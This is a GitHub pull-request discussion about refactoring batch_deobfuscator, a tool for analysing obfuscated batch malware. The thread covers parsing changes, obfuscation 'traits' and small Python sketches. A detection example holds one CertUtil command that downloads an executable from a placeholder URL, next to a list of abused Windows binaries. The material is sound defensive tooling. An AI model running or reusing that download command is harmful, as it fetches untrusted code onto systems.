batch_deobfuscator Major refactoring

Hi, I think it could be of interest to merge back the improvements that I've made to the project. As you will see, I modified quite a lot. It would be hard to point to just a few changes, since I touched a large percentage of the project. I also added some experimental features that you may not want, so I don't know how we'll be able to merge if you don't want those. I'll go over a few of the changes that I think are worthwhile:

Added multiple tests. For fun, you could download my two test files and run them against the previous version to see what my changes improved. I generated the expected results by running the commands on a VM, but if you disagree with the expected result of a test, I would be very interested to know.
The get_commands function now tries to beautify IF and FOR statements by splitting them into multiple lines for easier interpretation. One advantage is that a statement such as IF "A"=="A" (set A=1) else (set A=0) now yields a valid value for the variable A. If I recall correctly, in the original code the variable A would be equal to 1) else (set A=0). Now it will be equal to 0. The beautifying process splits the statement into four lines, and since they are parsed in sequence, A gets the value 1, then 0, before the parser moves on to the next lines of the script.
I modified get_value to handle special characters in variable names, to handle slicing better, and to handle replacement (with a possible asterisk wildcard).
I created a function to handle the set command, built around a state machine. I believe it is greatly improved. There are quite a lot of use cases where it made a difference, and running the tests on the previous version and on this one is probably the best way to see it. I interpret the options at the moment, but decided against doing an eval() on the content of the set value when /a is used. I just surround it with parentheses.
I skip any line that starts with REM, as we don't want to interpret comments even if they contain code. I had some cases where they contained invalid code and batch_deobfuscator didn't like it.
I changed interpret_command to be recursive on CALL, instead of only allowing a single CALL in front of a command. That way any number of CALLs can be chained.
Parsing of the curl command options; I'll explain why later.
Lots of modifications to the normalized_command function, with recursion when getting a variable value.
Lastly, the one you may not be interested in: a traits dictionary.
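
To illustrate the IF/ELSE point above, here is a minimal sketch of the idea, not the PR's actual implementation. The helper names beautify and apply_sets are hypothetical, quoted or escaped parentheses are ignored, and the exact line boundaries produced by get_commands may differ from what this sketch emits.

```python
def beautify(statement):
    """Split a one-line IF/ELSE statement at its parentheses (hypothetical helper).

    Simplification: parentheses inside quotes or escaped with ^ are not handled.
    """
    lines, current = [], ""
    for ch in statement:
        if ch == "(":
            # The opening parenthesis ends the current line.
            lines.append((current + ch).strip())
            current = ""
        elif ch == ")":
            # Flush the command inside the block, then start a new line with ")".
            if current.strip():
                lines.append(current.strip())
            current = ch
        else:
            current += ch
    if current.strip():
        lines.append(current.strip())
    return lines


def apply_sets(lines):
    """Process SET lines in order, ignoring conditions, and return the variables."""
    variables = {}
    for line in lines:
        if line.lower().startswith("set "):
            name, _, value = line[4:].partition("=")
            variables[name.strip()] = value
    return variables


statement = 'IF "A"=="A" (set A=1) else (set A=0)'
lines = beautify(statement)
variables = apply_sets(lines)  # A is assigned "1", then overwritten with "0"

# Without splitting, everything after the first "=" becomes the value.
unsplit = apply_sets(["set A=1) else (set A=0)"])
```

Because both branches are processed in sequence, the last assignment wins, which matches the behavior described above. The unsplit case shows roughly how a trailing `) else (set A=0)` can leak into the value when the statement is treated as a single SET.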

The traits dictionary is a structure that I want to use to store curious or interesting features of the script being analyzed. Currently it doesn't hold much, but it could be extended over time. One of my traits is populated in the interpret_curl function, where I store the location of the exact line that did the download, the source, and the destination. Two other traits are populated at the end of normalized_command: start_with_var, which is a boolean, and var_used, which is an integer. The goal is to flag lines that start with a variable, a possible sign of obfuscation, and to count the number of variables used on a single line. If that number is very high, it is another possible sign of obfuscation. You can see a clear example of those two in test_unittest.py -> test_single_quote_var_name_rewrite_2.
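
As a rough sketch of how the start_with_var and var_used traits could be computed for one line (an assumption for illustration, not the code in normalized_command): the function name line_traits and the regular expression are hypothetical, and only %NAME% references are counted.

```python
import re

# Simplified on purpose: matches %NAME% only. Delayed expansion (!NAME!),
# positional arguments (%1) and literal percent signs are not handled.
VAR_REF = re.compile(r"%[^%]+%")


def line_traits(line):
    """Return the two traits for a single command line (hypothetical helper)."""
    stripped = line.lstrip()
    return {
        # True when the very first token of the line is a variable reference.
        "start_with_var": VAR_REF.match(stripped) is not None,
        # Number of variable references found on the line.
        "var_used": len(VAR_REF.findall(stripped)),
    }


obfuscated = line_traits("%a%%b%%c% hello")
plain = line_traits("echo %PATH%")
```

A line built entirely from variables, as in the first call, sets start_with_var and yields a higher var_used count than an ordinary command such as the second.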

I did not modify the main function, and barely modified the two interpret_logical_line* functions: I believe there was a typo and a missing clear() call. I personally don't use those, and made my own. I could try to merge my interpret_logical_line if there is interest. Both of the ones currently in the file end up printing to the console, as the _str variant calls the non-_str one for child executions. In my interpret_logical_line, at a higher level, I also keep track of a few things, which allows me to generate two or three other traits.

Take your time to look into it, and if you have any questions or want to discuss it, I am more than happy to chat with you.

Jul 22 '22 12:07 gdesmar

Thank you very much for the PR. However, it may take a while for me to review the PR and merge. Please bear with me.

@wmetcalf can you also take a look?

Jul 23 '22 21:07 DissectMalware

Hi, I refactored my code to merge all my traits into this library.

Detecting if the script is a one-liner, even if there is one or more empty lines in the file.
Detecting whether the one-liner expands into too many lines, in which case it is flagged as a complex one-liner. The line-count threshold is configurable.
Detection of LOLBAS usage.
Detection of command grouping, when command splitting is different before and after normalization.
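
A minimal sketch of what the one-liner and LOLBAS checks could look like, under stated assumptions: the function names, the default threshold of 10, and the short LOLBAS_NAMES list are all hypothetical and chosen for illustration, not taken from the PR.

```python
import re

# A small illustrative subset of binaries catalogued by the LOLBAS project.
LOLBAS_NAMES = {"certutil", "bitsadmin", "mshta", "regsvr32", "rundll32"}


def is_one_liner(script):
    """True when the script has exactly one non-empty line."""
    return sum(1 for line in script.splitlines() if line.strip()) == 1


def is_complex_one_liner(script, expanded_lines, threshold=10):
    """True when a one-liner expands into more than `threshold` lines.

    `expanded_lines` is assumed to be the result of splitting the single
    line into individual commands; `threshold` is the configurable limit.
    """
    return is_one_liner(script) and len(expanded_lines) > threshold


def lolbas_used(command):
    """Return the known LOLBAS names that appear as tokens in a command."""
    found = set()
    for token in re.findall(r"[\w.-]+", command.lower()):
        name = token[:-4] if token.endswith(".exe") else token
        if name in LOLBAS_NAMES:
            found.add(name)
    return sorted(found)


padded = is_one_liner("\n\necho hi\n\n")
hits = lolbas_used(r"C:\Windows\System32\CertUtil.exe -urlcache -f http://x/y.exe out.exe")
```

Empty lines are ignored when counting, so a file with blank padding around a single command still counts as a one-liner.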

I also added my replacements for the different interpret_logical_line functions: a combination of the analyze and analyze_logical_line functions. I make recursive calls to analyze_logical_line to handle command grouping. A big difference from the interpret_logical_line functions that are already present is that I generate the extracted children and the deobfuscated script as distinct files. On top of the previous batch children, I also try to search for PowerShell children. The logic for PowerShell children is not perfect yet, and I have examples where I want to improve it. It may end up in the interpret_command function with the other command interpreters.

Unless you want to use my analyze function somewhere, this last commit should have no impact on the code that was already there.

Thanks for reviewing. I know that the script was first and foremost doing variable management for replacement and resolution, and that my additions may have changed the focus of the project. There may be a way to create another library to separate out the analytic part of my additions, if you'd prefer to concentrate on variables.

Aug 12 '22 17:08 gdesmar

I finally had some time to go through all of this and play with it a bit. Looks good to me! I say ship it!

Oct 20 '22 13:10 wmetcalf

Thank you @gdesmar for your PR. Thank you @wmetcalf for the review.

The PR is merged.

Oct 24 '22 18:10 DissectMalware